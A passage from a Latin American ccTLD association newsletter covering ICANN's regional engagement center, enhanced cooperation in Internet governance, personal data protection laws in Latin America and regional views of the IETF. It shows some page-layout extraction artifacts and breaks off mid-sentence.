lot of system objects I don’t control in the list, I’ll use the Search box to find all objects in my application’s top level namespace “SampleLeak”. After I search, I see that SampleLeak.Models.User has increased the most in both size, and count (there are additional 10 objects compared to the baseline). This is a good indication that User may be leaking. The next thing to do is determine why User objects are not being collected. To do this, I select the SampleLeak.Models.User row in the top table. This will then show me the reference graph for all User objects in the bottom pane. Here I can see that SampleLeak.Models.User[] has added an additional 10 references to User objects (notice the reference count diff matches the count diff of User). Since I don’t remember explicitly creating a User[] in my code, I’ll expand the reference graph back to the root to figure out what is referencing the User[]. Once I’ve finished expansion, I can see that the User[] is part of a List<User> which is directly being referenced by a that is a the static variable SampleLeak.Data.UserRepository.m_userCache (static variables are GC roots) Next I’ll go to the UserRepository class I added to the application. public static class UserRepository { //Store a local copy of recent users in memory to prevent extra database queries static private List<User> m_userCache = new List<User>(); public static List<User> UserCache { get { return m_userCache; } } public static User GetUser(string userID) { //Retrieve the user’s database record User user = MockDatabase.SelectOrCreateUser( “select Id, UserName from Users where Id = @p1”, userID); //Add the user to cache before returning m_userCache.Add(user); return user; } } Note, at this point determining the right fix usually requires an understanding of how the application works. In the case of my sample application, when a user loads the Home page, the page’s controller queries the UserRepository for the user’s database record. If the user does not have an existing record a new one is created and returned to the controller. In my UserRepository I have created a static List<User> I’m using as a cache to keep local copies so I don’t always need to query the database. However, statics are automatically rooted, which is why the List<User> shows as directly referenced by a root rather than by UserRepository. Coming back to the investigation, a review of the logic in my GetUser() method reveals that the problem is I’m not checking the cache before querying the database, so on every page load I’m creating a new User object and adding it to the cache. To fix this problem I need to check the cache before querying the database. public static User GetUser(string userID) { //Check to see if the user is in the local cache var cachedUser = from user in m_userCache where user.Id == userID select user; if (cachedUser.Count() > 0) { return cachedUser.FirstOrDefault(); } else { //User is not in the local cache, retrieve user from the database User user = MockDatabase.SelectOrCreateUser( “select * from Users where Id = @p1”, userID); //Add the user to cache before returning m_userCache.Add(user); return user; } } Validating the fix Once I make these changes I want to verify that I have correctly fixed the problem. In order to do this, I’ll launch the modified application again and after 20 page refreshes, Performance Monitor shows me only a minimal increase in memory (some variation is to be expected as garbage builds up until it is collected). Just to definitely validate the fixes, I’ll capture one more dump and a look at it shows me that Byte[] is no longer the object type taking up the most memory. When I do expand Byte[] I can see that the largest instance is much smaller than the previous 1 MB instances, and it is not being referenced by User. Searching for User shows me one instance in memory rather than 20, so I am confident I have fixed both of these issues. In Closing We walked through a simple example that showed how to use Visual Studio 2013 to diagnose memory problems using dump files with heap. While the example was simple, hopefully you can see how this can be applied to memory problems you have with your applications in production. So if you find yourself in a scenario where you need to be using less memory, or you suspect there is a memory leak give Visual Studio 2013 Ultimate a try. Feel free to download the sample project used in this blog post and try it for yourself. It is recommended that you continue by reading part 2 of this post covering additional features. If you have any comments/questions I’d love to hear them in the comments below or in our MSDN forum. Using the example in this post If you would like to try the sample I showed in this post do the following: - Download the attached SampleLeakFiles.zip file and extract the contents - In Visual Studio 2013 Create a new C# ASP.NET MVC project and name it “SampleLeak” (make sure to use the new Visual Studio 2013 One ASP.NET template) - Replace the contents of the generated “Controllers\HomeController.cs” with the copy from the .zip - Add the “User.cs” included in this .zip to the “Models” folder - Add the included UserRepository.cs and MockDatabase.cs to the project Your SampleLeak MVC app will now match the app I used to create this blog post Hi Doesn't the first CTP release only in the 26 June? We can't use the sample code yet to debug the memory issues in 2013 as the read me file suggests =(. @Gordon The sample code attached will work to create the project in Visual Studio 2012 as well as Visual Studio 2013, but yes you will have to wait till preview is available next week to try the new memory feature in 2013 This looks like a great feature, and this was a great post. I've done investigations in the past using WinDbg, examining the objects on the heap, writing down values of largest size, and largest numbers of objects on a heap. This tooling appears to really assist what I had to do in WinDbg to get to a memory leak. I like your example of finding a leak related to objects held in a List<> collection. I encountered a similar problem in a WPF application, where ViewModels were getting swapped around as a user navigated to different parts of the app, and the ViewModel wasn't clearing it's internal collections. Look forward to getting Visual Studio 2013 preview next week and exploring this feature more. Why worry about memory problems? Because the LOH still (we're > 12yrs in now) does not compress used space. Great article! Looking forward to VS 2013! PLEASE also give us tools that handles .NET and WinRT classes working together and falling over each other and causing memory leaks. The GC vs ref-counting differences causes a boatload of gotchas that are near-impossible to find today. The only option is really trial and error. Please pretty PLEASE Awesome, thanks! Will you fix the GUI in VS 2013? @Morten, thanks for the feedback. Unfortunately this tool won't specifically help you with this scenario (although it will show you your references to WinRT classes). This is a scenario we will be looking into providing better tooling in the future. If you would like to discuss the specific scenarios you are struggling with please feel free to contact me at andrehal@microsoft.com @ThomasX, is there specific UI you are referring to in Visual Studio? "@ThomasX, is there specific UI you are referring to in Visual Studio?" are you seriously asking this? WE TELL YOU A VERY LONG TIME, THAT WE WANT THE COLORED ICONS FROM VS2010 BACK. The ugly icons make it nearly impossible to use VS2012 without getting a headache after a few minutes! IS THIS SO HARD TO UNDERSTAND? @Andre Thank you for the frank feedback. In regards to color have you seen the blue theme that was added to Visual Studio 2012 in Update #2? The blue theme looks very similar to Visual Studio 2010, and has been further enhanced in Visual Studio 2013 (the screenshots above were taken in the blue theme). If you would like to see specific improvements to the blue theme or the colors in Visual Studio we continue to leverage community feedback, so please either file a connect bug using Microsoft Connect (connect.microsoft.com/VisualStudio), provide feedback on the Visual Studio User Voice site (visualstudio.uservoice.com), or use the new Feedback icon in the top right of Visual Studio 2013 Preview which will be the most effective channels for that feedback. Greg, for LOH see this post: blogs.msdn.com/…/no-more-memory-fragmentation-on-the-large-object-heap.aspx Does this work for 64bit processes as well? I've done some dumps with procDump for from our .net service. But the "Debug Managed Memory" option is not visible when I loading this dump. Would't that be nice if you can create such dump files (with correct parameters) directly from VS. Remote processes (services) should be also supported. Is such a feature planned for the RTM or for any upcoming version? @Toni_Wenzel "Wouldn't that be nice if you can create such dump files (with correct parameters) directly from VS." You can 🙂 when you are debugging a process with Visual Studio, when you are in a break state you can use "Debug -> Save Dump As…" to save the dump file. It was subtly linked to in the post above, but see the following blog post for full details (it also covers procump and task manager) blogs.msdn.com/…/what-is-a-dump-and-how-do-i-create-one.aspx You might want to highlight the requirement of using the 4.5 Framework at the beginning of your article. I downloaded the preview just to try this feature but couldn't do so since our process runs on 4.0. @Brian Thanks for the feedback, I updated the introduction above to call this out "If the dump was collected on an older version the option will be disabled with a tooltip explaining why." This is not the case, is it? It would be great to have though, it took me a while to figure out why this option is missing. I only skimmed over your post and didn't notice this (btw unfortunate) requirement. @Floele Thanks for the comment, you are correct my apologies for the mistake; I have corrected this in the post. If the process is 3.5 (or previous) the option does not appear, if it was 4.0 it will fail to launch with an error message. Thanks for this great article. I'm trying it out, but get an error when trying to debug managed memory: Managed debugging is not available for this minidump. the version of clr.dll in the target does not match the one mscordacwks.dll was built for. Target process is a 64-bit .NET 4.5 process on a Win7 machine with SP1. Any idea? @Michiel To analyze managed code the debugger needs the matching version of mscordacwks.dll for the target process, it can get this from the Microsoft Symbol Servers when the machine you are running on has a different version. To do this, enable "Microsoft Symbol Servers" in your symbol settings (Tools -> Options -> Debugging -> Symbols, check "Microsoft Symbol Servers" and specify a local cache) it will download the necessary mscordacwks from the symbol server and everything should work as expected. The dump file summary screenshot shows that your analysis was done using the 4.0 CLR [1]. I really have a need to perform post-mortem analysis for a large 4.0 CLR problem. Rebuilding everything for 4.5 is not an option. What do I do ? While we're at it, the problem in question is due to "un-rooted" objects, at least according to PSSCOR4. Clearly with 700MB of these in LOH at generation 2 suggests otherwise. That is, there must be a mismatch between the tool's algorithm and the actual implementation of the GC when it comes to determining whether an object can be collected. This suggests that being rooted is only part of the determination. What does this feature do in this regard ? [1] blogs.msdn.com/…/8836.image_5F00_74AE0323.png @Richard .NET 4.5 was a minor version in-place upgrade that guarantees backward compatibility so it only updated the "minor version" number just like it was a service pack or security update (the RTM version number was 4.0.30319.17913, meaning only the last 5 digits changed-in my screenshot I'm actually running on 4.5.1 which is why the version number shows as 4.0.30319.32559). Regarding the use of this tool, what matters is the version you are running on, not what version you compiled against. So since 4.5 guarantees backward compatibility, you could update the version running on the machine and your binaries will continue to run correctly and this tool will work because it relies on capabilities that were introduced in 4.5 but not present in 4.0. It sounds like you are asking about data you are seeing in psscor4, unfortunately I can't say whether the data you are seeing is a bug or if a garbage collection just hasn't occurred yet to clean those objects (objects can be in memory not rooted because they have not been collected yet). You can try cross-referring the data by using PerfView (…/details.aspx) Hi! I have an x64 memory dump of w3wp process. When I open in VS2013 managed memory analysis view (without filters), it shows that there are 18 Mb of String instances. And !dumpheap -stat in WinDBG shows 160 Mb of String instances. Why so? @Dronkoff WinDbg shows all managed objects in the heap, whether they are rooted or not (and thus eligible for Garbage Collection) [1]. Managed Memory Analysis in VS 2013 shows only those managed objects in the heap which are rooted (are roots themselves or have a path to a root), without having to explicitly force a GC prior to creating the minidump. The rationale is that unrooted objects will be released in the next GC for that generation and will not be the cause of your memory leak. This would explain why VS 2013 shows a smaller number/size of instances than WinDbg. To test this out, you can try forcing a GC in your code (GC.Collect(3) as mentioned in [1]), take another memory dump – WinDbg and VS should now display the same stats. If you prefer, we (the Managed Memory Analysis crew) can take a look at the memory dump to verify that this is the case. Shoot us an email at vsdbgfb at microsoft dot com to get started. [1] blogs.msdn.com/…/496973.aspx Hi, I don't see the "Debug Managed Memory" option. I've tried both the latest procdump and Debug/Save Dump As… My project targets .NET 4 but is (obviously) running on a .NET 4.5.1 machine via VS2013. I even tried creating a new console app targetting 4.5.1, then captured a dump with procdump. I still don't see the "Debug Managed Memory" option. Same if I use VS to capture the dump. Any ideas what's wrong? VS2013 Update2 Professional, if it matters. Thanks @kent As called out at the beginning of the post this feature is only available in the Ultimate edition of Visual Studio 2013. So you will not see the option in Professional. Seems Intelltrace can do the same as well? not suure what's the main diffenerce? how to select the different approach to analysis the memory issue? @seems it overlaps with intelltrace? IntelliTrace does not capture memory information so there should not be any overlap between the two. You may be thinking about the memory .diagsession files which are generated in Application Insights and Azure Websites (blogs.msdn.com/…/investigating-memory-leaks-in-azure-web-sites-with-visual-studio-2013.aspx)? If that's the case, the differences are the memory .diagsession files are significantly smaller, but do not give you instance data (blogs.msdn.com/…/net-memory-analysis-object-inspection.aspx). Additionally it may not always be feasible to collect a .diagsession file (e.g. if the process crashes with an out of memory exception) where you can save a dump at that point. Hi and many thanks for the useful post! A problem with VS2013 I am having is that there is no “Select Baseline” dropdown – everything else works as described. Is this something not available in the trial version of VS 2013 Ultimate? Thank you again! Not included in premium.. like always it just Su**ks ! @Ju, please check out the Visual Studio 2015 SKU changes. There is no longer a separate Premium and Ultimate, they've been consolidated into an Enterprise SKU at the previous price level of Premium
https://blogs.msdn.microsoft.com/visualstudioalm/2013/06/20/using-visual-studio-2013-to-diagnose-net-memory-issues-in-production/
CC-MAIN-2016-40
refinedweb
4,785
62.78
Hi Bill, if a system did not define the constants we should not use them. I prefer to #ifdef the line where the additional constants are used. I cant believe that a system take acount on bits which are not defined. And defining bits as workaround is not the solution here. Simply leave them in the call if the system did not have them. For that we could simply : ifdef POLLRDNORM .... No aditional OS testing needed. What do you think? Bye Klaus > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > In that man page for poll I see the following text: > > ~ */ > ~ #endif > > My guess is that David doesn't have this. Klaus, would it be a bad > idea for you to condition your use of POLLRDNORM on _XOPEN_SOURCE? I > don't know the correct solution here....if you need that feature, then > we need to find a solution. I also suspect that it is better for us to > define our own #define for the use of this value, and let configure > determine how whether or not to use it. (for all I know, other systems > also provide/use this value) > > > > Klaus Rudolph wrote: > > | Hi David, > | > | the problem is related to OS X. 'POLLRDNORM' is defined somewhere > | in the system header files <asm/poll.h> in linux and it looks that > | for OS X this is not correct. My problem is that I have no access > | to any OS X machine. I google a bit and found that in OS X the > | constants should be defined in poll.h > | > | Could you please try: #include <poll.h> in front of the file > | mysocket.cpp. If this will not work, could you please grep through > | your system header files for the lost constants and add the missing > | header to mysocket.cpp and try to compile again, maybe we will run > | in some more "compatibility" problems. > | > | I hope we will be able to make the simulavrxx running on OS X. If > | so, we (Bill :-)) will change the configure tests for os x and we > | could put that on the CVS. > | > | If you are not the familar with searching for such things you maybe > | could give me or Bill access to your machine? If so please send me > | a PM. > | > | Thank you for your help! > | > | Klaus > | > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.2.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - > > iD8DBQFBbzgnuZBxYuVmoeoRAtpRAJ4//gZhIoj4ohXcI++EUJeaE6CdXACggkgx > 1EaH39bzXLAyyexd+E8Rqgk= > =HAMl > -----END PGP SIGNATURE----- > > > > _______________________________________________ > Simulavr-devel mailing list > address@hidden > > -- +++ GMX DSL Premiumtarife 3 Monate gratis* + WLAN-Router 0,- EUR* +++ Clevere DSL-Nutzer wechseln jetzt zu GMX:
http://lists.gnu.org/archive/html/simulavr-devel/2004-10/msg00018.html
CC-MAIN-2015-11
refinedweb
427
82.65
This is a follow up to my solved thread a few days ago about extracting parts of a RegEx search in a web scraping app. Now, I have a script that includes 4 RegEx searches that each work individually. Now I want to compile all 4 into a single search and return the 4 pieces of information in a single list. I've seen examples on the web using a plus sign "+" in between the RegEx's, but when I do that, I get an empty list returned (this is also the result if I use nothing between the searches). If I use "and" in place of "+", only the last search returns its value. import re import urllib f = urllib.urlopen("") tennis_rankings = f.read() #++++++++++++++++++ The RegEx's below all work individually #They extract, in order: 1) player's rank, 2) player's name, 3) player's total points, 4) number of tourneys played #tennis_players = re.compile("<div class=\"entrylisttext\">([\d+]*)</div>", re.I | re.S | re.M) #tennis_players = re.compile("playernumber=[A-Z][0-9]+\" id=\"blacklink\">([a-zA-Z]+, [a-zA-Z]+)", re.I | re.S | re.M) #tennis_players = re.compile("pointsbreakdown.asp\?player=[A-Z][0-9]+&ss=y\" id=\"blacklink\">([0-9]+)", re.I | re.S | re.M) #tennis_players = re.compile("playeractivity.asp\?player=[A-Z][0-9]+\" id=\"blacklink\">([0-9]+)", re.I | re.S | re.M) #++++++++++++++++++ Now, together as a single search tennis_players = re.compile("<div class=\"entrylisttext\">([\d+]*)</div>" + "playernumber=[A-Z][0-9]+\" id=\"blacklink\">([a-zA-Z]+, [a-zA-Z]+)" + "pointsbreakdown.asp\?player=[A-Z][0-9]+&ss=y\" id=\"blacklink\">([0-9]+)" + "playeractivity.asp\?player=[A-Z][0-9]+\" id=\"blacklink\">([0-9]+)", re.I | re.S | re.M) find_result = tennis_players.findall(tennis_rankings) print find_result print 'done My preferred return is some sort of array of tuples: [('1', 'Federer, Roger', '6600', '18'), ('2', 'Nadal, Rafael', '5800', '19'), ('3', 'Djokovic, Novak', '4900','20'), ...] Any help would be appreciated!
https://www.daniweb.com/programming/software-development/threads/136562/newbie-concatenating-multiple-regex-s
CC-MAIN-2019-04
refinedweb
326
52.66
ISSN: 2301-1025 2nd year, 3rd edition LACTLD The Latin American and Caribbean ccTLD publication ANOTHER YEAR OF GROWTH AND CHANGES The Internet is constantly evolving. So are its challenges. The opportunities for development, participation and representation of stakeholders in the region encourage us to face 2014 with high expectations. IETF, by two regional technical experts Security: personal data protection in Latin America Enhanced cooperation and Internet governance EDITORIAL STAFF LACTLD Report 3rd edition 2nd year, 2013 Board of Directors Eduardo Santoyo Luis Arancibia Víctor Abboud Clara Collado Frederico Neves Editorial Board Eduardo Santoyo Luis Arancibia Clara Collado Carolina Aguerre General Coordination Marilina Esquivel Editorial assistant Sofía Zerbino Art & Design Frida Photography Martín Mañana Image banks Images provided by the registries Translation Virginia Algorta LACTLD LACTLD Report is the ccTLD publication of Latin American and Caribbean TLD Association (LACTLD). The published material does not compromise in any way LACTLD’s responsibility. The opinions expressed belong solely to the authors and do not necessarily represent the Association’s views. This is a work licensed under Creative Commons Except when expressed otherwise, this work is under an Attribution Licence. In every use of the work authorized by this licence it will be necessary to acknowledge the authorship (compulsory in all cases). Summary 3. Continued collaboration: LACTLD Report first anniversary By Eduardo Santoyo 4. In Latin America and the Caribbean, ICANN continues to grow By Alexandra Dans 3 • LACTLD Continued collaboration: LACTLD Report first anniversary Dear Readers, Another year ends – with plenty of debates, discussions and joint efforts to stimulate the ccTLD growth, both within and outside the region of Latin America and the Caribbean. In this letter I would like to thank you all for your hard work and also invite you to continue sharing the rewarding task of promoting Registry cooperation and development during 2014. The third issue of the LACTLD Report contains various articles and piece of news. A relevant announcement is that the publication is now catalogued under the ISSN system, which will enable to index and reference globally. In terms of the information, there is information about ICANN’s new Engagement Center in Latin America and the Caribbean, which opened in Montevideo, Uruguay and it aims to increase the representation of diverse stakeholders within the scope of this organization. The subject of enhanced cooperation is addressed in an article that explains the present situation and the challenges faced for its implementation. The creation of a working group (WGEC) and the enriching discussions around this topic are also treated in these pages. A very hot subject is the protection of personal data on the Internet, which is presented in a general way and also according to the laws of different countries of the region. As the commentator notes, the main problem of the regulation system is its enforcement and implementation. Furthermore, in two articles, experts from NIC.cl and LACNIC provide their views on the significance of the Internet Engineering Task Force (IETF), its impact on the community and they explain the relevance of the participation of representatives of the region. The Report also contains an article about the role of the DNS Security Extensions in the approach to security problems and inconveniences that are faced in this task by one of the world experts in the field, Patrick Fälström from NETNOD. As is usual in this publication, we include an overview on the evolution of the registration of domain names. Latin America is slashing the nine million domain names and continues to grow at high rates in comparative terms with other regions. And we also used these pages to congratulate NiC.br for its 25th anniversary. I wish you a Happy New Year and meet you again in the fourth issue of our Report in May 2014. Eduardo Santoyo President LACTLD 6. Enhacing stakeholders cooperation By Carolina Aguerre 11. Personal data protection in Latin America By Alberto Cerda Silva 14. Two regional views of IETF By Hugo Salgado By Carlos Martínez Cagnazzo 17. Domain names, evolution and trends By LACTLD 20. The importance of DNSSEC By Patrik Fältström 22. .br celebrates 25 years Columns in Latin America and the Caribbean, ICANN continues to grow could not be oblivious to the fact that Latin America is the region where social media is most widely used. We invite you to follow us at @ICANN_es and @ ICANN_pt. We also work with Scoop.it, a tool that allows us to share all press releases and news on ICANN, both in Spanish and Portuguese. News can be found at: and at:. it/t/noticias-em-portugues. By Alexandra Dans Communications Manager for Latin America and the Caribbean The opening of the Engagement Center in Montevideo and the visit of the president of the corporation, Fadi Chehadé, as well as the holding of the 48th ICANN meeting in Buenos Aires are developments that demonstrate the strength of the organization. In recent months, several developments have mobilized us at ICANN. Among the main ones, there is the opening of our Engagement Center for Latin America and the Caribbean in July 2013. The inauguration took place in the context of our efforts to internationalize our operations. The purpose of this Center is to increase participation and improve our relationship with different stakeholders from the Internet community, fulfilling the communication needs of our region. The Engagement Center is located in Casa de Internet Latinoamérica y el Caribe (Latin America and the Caribbean Internet House), a unique initiative in the world. This privileged position allows synergies with sister organizations in the region as the Latin America and Caribbean Network Information Centre (LACNIC), the Internet Society (ISOC) and LACTLD, among many others. ICANN’s team for the region of Latin America and the Caribbean is composed of Rodrigo de la Parra, Vice President for Latin America and the Caribbean, Albert Daniels, relationship manager for the Caribbean, and Alexandra Dans, Communications Manager for Latin America and the Caribbean. We recommend watching the video of Casa de Internet, available in Spanish with subtitles in English and Portuguese. The Spanish version with English subtitles is available at: watch?v=0-_XYyj67Pk and the Spanish version with Portuguese subtitles is available at: watch?v=uhF314uU6Hc As of the opening of the Engagement Center for the region, we also opened two Twitter accounts to share the latest news in Spanish and Portuguese. We 4 • LACTLD Furthermore, in October this year, our President and CEO, Fadi Chehadé, honored us with a visit to our Engagement Center at Casa de Internet and to the Uruguay ccTLD. Officers visited the Central Computer Service (SeCIU) at Universidad de la República, the entity responsible for Uruguayan ccTLD (.uy), which formalized its relationship with ICANN in 2009. Fadi said that the experience was extremely positive and that he really enjoyed taking part in this event. Meetings held at Casa de Internet with leading organizations in charge of Internet governance resulted in a historical and extremely relevant document to the future of cooperation on the internet called “Declaration of Montevideo”. This document was also central to many discussions of the Internet Governance Forum held in Bali. You should read it here:. icann.org/es/news/press/releases/ release-07oct13-es Meeting in Buenos Aires Another good news for this year and that really excites us is the holding of our organization’s 48th meeting in the iconic city of Buenos Aires from November 17 to 21. We met in this city 15 years ago to discuss the white paper that would lead to the creation of ICANN. We invite you to watch the video “Internet pioneers in the region of Latin America and the Caribbean” that we have prepared for this important occasion and which shall be released during the event. The link to the event website is: http:// buenosaires48.icann.org/es. During the meeting, a tri-fold brochure in Spanish, Portuguese and English 5 • LACTLD shall be distributed, intended as a guide for participants from our region to assist them in the choice of the sessions that best suit their interests. You may check the rooms and times of the following sessions in Latin America and the Caribbean Participants’ Guide: • Legal LACTLD Workshop (closed session). • Opening Session (open session). • Presentation of the Strategic Plan for the region (open session). • A place for economic actors in Latin America and the Caribbean in ICANN meetings (open session). • Let’s talk about IPv6 in Latin America and the Caribbean (open session). • Cocktail for local companies and businesses (RSVP). • Breakfast for local companies and businesses (RSVP). • Academy and ICANN in Latin America and the Caribbean (open session). • Challenges to security and stability in the region (open session). • Outstanding Achievement Award (open session). We invite you to follow us on blog. icann.org where we regularly publish notes related to our work in our region. Strategic Plan for the region Our organization found that there still is a low representation of certain groups of interest within ICANN. Many of the actions of the strategic plan currently being implemented seek to alleviate the situation and encourage the participation of groups that do not currently participate in an active manner. Our Relationship Centre works under that approach, for example by producing guidance material and content in the languages of our region. Several projects are already underway. One of them is to strengthen our presence in the regional press and, as already mentioned, in social media in the languages of the region. A significant effort is being made for greater visibility in the region, for example through the promotion of new content on different topics of interest in Spanish (see for example, the last notes in Spanish on ICANN’s blog, the latest press releases disseminated in Spanish and the promotional material to be distributed in Buenos Aires). Also, we shall very soon launch ICANN’s website for Latin America and the Caribbean. Finally, within the strategic plan, the purpose is to also seek to support the holding of technical workshops, as the one that LACTLD organized on September 3, 3013 in Panamá. documents By Carolina Aguerre Enhancing stakeholder cooperation; With the new millennium, the problem of the new technologies in governmental agendas became much more visible. (ii) the principle of enhanced cooperation to promote mechanisms of participation and involvement of all actors, particularly those of governments (see text-box with articles). According to Markus Kummer, vicepresident for Global Policy of the Internet Society (ISOC) enhanced cooperation is “one of the code words in Internet governance discussions and means different things to different people. The term goes back to the second phase 6 • LACTLD of World Summit on the Information Society held in Tunis in 2005. There is no common understanding of what is meant with the term, but it is used by some countries to push for setting up a new UN body to deal with Internet issues.”1 [1] Source: blog/2012/07/internet-governance-what-enhancedcooperation 7 • LACTLD The critical issues of enhanced cooperation. 71. The process towards enhanced cooperation, to be started by the UN SecretaryGeneral,. Source: documents Since 2015 is fast approaching and that year is a landmark since it is a decade after the Tunis Agenda and evaluations about Internet Governance will be performed, enhanced cooperation becomes of the most controversial issues due to the ambiguity of its definition, scope and operationalization.2: (i) level of implementation of the principles contained in the Tunis Agenda; (ii) public policy issues and possible mechanisms; (iii) the role of stakeholders; the different (iv) the role of developing countries and (v) the barriers for participation in enhanced cooperation. The following section develops the main points contained in each of these. [2] To access the full document and the analysis of responses: SessionalDocuments/WGEC_Summary_of_Responses.pdf 8 • LACTLD Internet Governance Forum ) 9 • LACT Regarding the role of developing countries, the generalized assessment of most respondents is that there is an imperative need to incorporate more stakeholders from these countries, inasmuch as they represent the major volume of users of the Internet in the world, and the forthcoming billion. Internet governance, comprised by 150 governmental and non-governmental organizations of the technical and board to supervise ICANN. (Initiative proposed by IT for Change, an Indian NGO). The government of Brazil, in documents DOCUMENTS Personal data protection in Latin America. of the different responses distinguishes two positions: some acknowledge a hierarchy between stakeholders, where governments should have a leading position; others on the contrary emphasize the equality of conditions for all. This is a key aspect for the future application of enhanced cooperation.. 10 • LACTLD By Alberto Cerda Silva Assistant Professor of Computer Law, School of Law, University of Chile We are experiencing many developments in the habeas data laws in the region. However, there is still room for improvement. Since the late 1960s, the increasing use of technology in the processing of personal information has raised international concerns about the compatibility of such use with the preservation of human rights and conditions specific to a democratic society. These led, in the late 1970s, to the adoption of laws in the United States and Europe which regulate the processing of such information. However, this issue has not been solved in Latin America, in part due the still small role that technology plays in the region but also to the existence of dictatorial and authoritarian governments with poor human rights commitment. This situation would change over time. Between the 1980’s and 1990’s, Latin America made some progress as far as its political re-democratization and increasing political openness are concerned. The democratization process revitalized the commitment to human rights, although initially focused on more pressing matters than those re11 • LACTLD sulting from the interaction with new technologies. At the same time, trade liberalization facilitated access to these technologies and improved the communications infrastructure in the region. At that time, Latin American countries adopted new constitutions which recognize the protection of the rights of individuals against undue use of information. However, the terse and sometimes ambiguous constitutional provisions do not guarantee adequate protection to people nor provide security to those who process personal data. This regime would change at the beginning of the new century. Changes in the new century. During the first decade of this century, Latin America tried to catch up with developed countries in terms of providing protection to people regarding their personal information. To the above mentioned constitutional protection, several countries added laws regulating in detail the rights and obligations associated with the processing of personal data. Such is the case of: Chile (1999), Argentina (2000), Uruguay (2008), Mexico (2010), Costa Rica and Peru (2011), Colombia and Nicaragua (2012), and soon Brazil. Although with some nuances, there currently is in Latin America a constitutional and legal protection against the processing of personal information by both public and private entities. Data protection laws generally guarantee that people control their personal information. DOCUMENTS Data protection laws generally guarantee that people control their personal information. Not only private but also public information. They have been rightly called habeas data laws, as the focus is not on the fact that information is private but rather that it concerns identified or identifiable individuals. Thus, the law protects not only information on health status or political, religious or sexual choices of individuals but also business information, credit reports, public records and even Internet connection numbers used by them. The adoption of specific laws on data protection of individuals represents a huge achievement. From this standpoint, the law not only strengthens the control over personal information, but it also enhances the exercise of individuals’ fundamental rights. From the perspective of those processing personal information, whether public or private entities, the law provides security regarding the use they can make of such data. A law on the protection of personal data is not enough. One of the fundamental problems in the region is to ensure its effective enforcement. From an international perception, an appropriate personal data law also removes certain obstacles to the flow of information, which prevent countries in the region from offering services in those countries that require adequate protection. Law enforcement But a law on protection of personal data is not enough. One of the fundamental problems in the region is to ensure its effective enforcement. The law is sometimes violated out of sheer ignorance. But, in other cases, it is more profitable to violate it than to comply with it. In cases of violation, the law must provide adequate compensation to the victims of data misuse, set the penalties applicable on those processing data improperly, and appoint an authority to oversee the effective compliance with the law. one country to another, complicating the work of online service operators that provide transnational services and causing the level of minimum protection offered to people across the region to be somewhat uncertain. This requires Latin America to make some progress in terms of regulatory convergence so that there is a minimum common denominator regarding the protection that people can get throughout the region. A third significant challenge to the regulation of the processing of personal data in Latin America relates to the technological environment. Although the contribution of courts is valuable, it is insufficient. Hence, most of the countries have established independent authorities to promote, educate, monitor and punish cases of violation of the law. Although laws are generally applicable, there still are doubts as to their application to telecommunication service operators, online service providers and Internet service providers, among others. A second critical aspect of the rules of the different Latin American countries is the lack of legislative harmonization. That is: laws still vary considerably from This issue has become especially sensitive in view of the adoption by some countries of data retention laws that require Internet providers to collect and 12 • LACTLD 13 • LACTLD Although laws are generally applicable, there still are doubts as to their application to telecommunication service operators, online service providers and Internet service providers, among others. store user data for a certain period of time in order to use them for purpose of criminal prosecution. The indiscriminate and surreptitious use of personal data by some operators for commercial or marketing purposes, which has not been consented to by the concerned individuals, is another pressing issue. Vision of the future Latin America has undoubtedly made some progress as far as the protection of personal data is concerned across the region. This protection combines constitutional provisions and general laws on the subject. In the coming years, we should see how the lagging countries join this trend and, at the same time, how countries deal with the mentioned above issues, effectively ensuring compliance, harmonizing rules and specifying the application of the law in certain contexts. In sum, although progress has been made, it is necessary to strengthen the protection of personal data in the region so that its use does not violate the rights of individuals or affect the democratic system. DOCUMENTS Two regional views of IETF Hugo Salgado, Engineer of NIC Chile (.CL), and Carlos Martínez Cagnazzo, LACNIC Engineer of Investigation and Development, write their thoughts about the Internet Engineering Task Force (IETF) Key IETF documents The importance of IETF in my work in a ccTLD is the series that defines the current version of DNSSEC (which actually was a second attempt to bring cryptography to the old DNS). It refers to RFCs 4033, 4034 and 4035. These are very well written and organized documents, the first provides an introduction, rationale and requirements, the second one defines new records, and the last one describes the behavioral changes in the protocol. In addition to the fact that they are important in themselves, a tremendous effort was put into updating and managing the DNS in general (e.g. the task of regulating the behavior of “empty-non-terminal”), which is noted as we revise the almost twenty old RFCs that are updated or left out of date. Sometimes there is more into it and you learn more with what is left out of an RFC than with what stays. IETF is not purely academic By Hugo Salgado Engineer of NIC Chile (.CL) After this first experience, I began to more closely follow the work on drafts being developed and I had the chance to participate in the last meeting of the working group that resulted in IDNA 2008, the documents that define the use of inter- nationalized domain names in the DNS (5890-5895). Having the privilege of seeing people like Vint Cerf, Steve Crocker and John Klensin work is something that reaffirmed my interest in the Internet as far as both its technological and mainly social capacities are concerned. IETF’s work is sometimes seen as academic or purely scientific. But this is not true. The academy has its own computing progress mechanisms based on the whole tradition of the scientific method and on its publication and discussion methods. IETF is responsible for the “engineering”, where scientific correction is no longer the only variable, as other aspects such as simplicity, ease of use, community acceptance, operational experience and even economic incentive forces are as important. These are all variables that influence the success of a standard. Bet on the social aspect I’ve always had an interest in the more social aspects of the Internet. And, in that sense, IETF continues to surprise me as an organization. A standardization entity that does not have members, where participation is open and no votes are cast, since decisions are taken 14 • LACTLD Need for more Latin American participation based on consensus, sounds too good to really work! The slogan “We reject kings, presidents and voting. We believe in rough consensus and running code” is like the cyberpunk anthem and represents a certain challenge to the way in which these institutions are usually organized. Possibly for historical and cultural reasons, there is a very passive attitude towards the creation of knowledge in Latin America, particularly in science and engineering. There are barriers for participation both in the IETF and in other standardization entities. There is a minimum level of knowledge on certain topics and language. Another obstacle, more difficult to assess, is culture; that is, how to use the knowledge and language in a given scenario. From time to time, the IETF Internet Architecture Board publishes RFCs that address general issues, architectural decisions and protocol design practices that try to capture all lessons learned over the years. I especially recommend “What Makes for a Successful Protocol?” (5218), “Uncoordinated Protocol Development Considered Harmful” (5704), “Evolution of the IP Model” (6250) and “Design Considerations for Protocol Extensions” (6709). Now that people are again talking about issues of transparency and neutrality on the net and are seeking mechanisms to prevent abuses of online political power, it is valuable to reread documents outlining this philosophy, such as “Reflections on Internet Transparency” (4924) and “Privacy considerations for Internet protocols” (6973). 15 • LACTLD These barriers are real and, in this context, a list called IETFLAC was created with the support of ISOC, LACNIC and other organizations, which goal is to provide some IETF experiences and encourage participation. Some of us have offered to be the point of contact to all of those 